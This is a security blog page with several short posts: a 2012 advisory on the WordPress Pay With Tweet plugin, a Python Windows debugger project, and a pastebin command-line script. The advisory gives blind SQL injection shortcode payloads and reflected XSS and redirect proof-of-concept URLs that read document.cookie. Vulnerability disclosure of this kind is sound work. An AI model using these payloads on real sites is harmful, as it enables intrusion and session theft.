Welcome to Cloudberry Engineering
a notebook on building, breaking and securing systems by Gianluca Brindisi. 
  • # Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1

    1) Blind SQL Injection in shortcode:

    Short code parameter ‘id’ is prone to blind sqli, you need to be able to write a post/page to exploit this:

    [paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]

    2) Multiple XSS in pay.php

    http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php

    After connecting to twitter:

    ?link=&22></input>[XSS]

    After submitting the tweet:

    ?title=[XSS]&dl=[REDIRECT-TO-URL]')")[XSS]

    The final download link will be replaced with [REDIRECT-TO-URL]

    POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"<script>alert(document.cookie)</script>

    # / #wordpress #advisory #sql-injection #xss

  • Simple Debugger (sdbg) is a minimal Windows debugger I wrote to sharpen my knowledge of debugging practices.

    It’s written in python and it’s obviously coded on top of the wonderful ctypes library. The overall architecture is heavily based on PyDbg since I was already familiar.

    At the moment of this writing it’s capable of setting soft, hard and memory breakpoints, it has a minimal interactive shell to retrieve registers status and it’s expandable with custom callbacks for handling exceptions.

    Building a debugger it’s been an awesome experience (except for the parts where I am swearing on the IA32 Intel docs) and I really learned a lot - and this was the main goal.

    Since I am starting to wet my feet in reverse engineering I am looking to eat my own dogfood and use it for analysing some samples from my malware collection. This way I hope to keep it updated and maybe add some new features too.

    As usual everything is GPLd and you can find it on my bitbucket page.

    # / #python #debugging #reverse-engineering
  • Introducing xsssniper
  • Tor + Polipo on OpenBSD

  • Since I haven’t managed to find a command line pastebin script whose based on the new APIs I wrote one.

    You can find it on my bitbucket.

    Usage:

    $ pastebin.py -f python -e 10M -p 1 -t MyPaste &lt; whatever

    Pratically you just pipe your data to the script.

    Here are some options:

    -f defines data format (php, python, etc)
-e the expiry time (10M, 1G, 1D, N)
-p the privacy (1 is private, 0 is public)
-t the title of the paste

    The script looks for a config file in your home dir with your dev API key and optionally an username and a valid password (without valid login credentials your pastes will be anonymous).

    The first time you run it will create the config (~/.pastebin).

    Feel free to fork/edit/whatever it.

    # / #python #cli #pastebin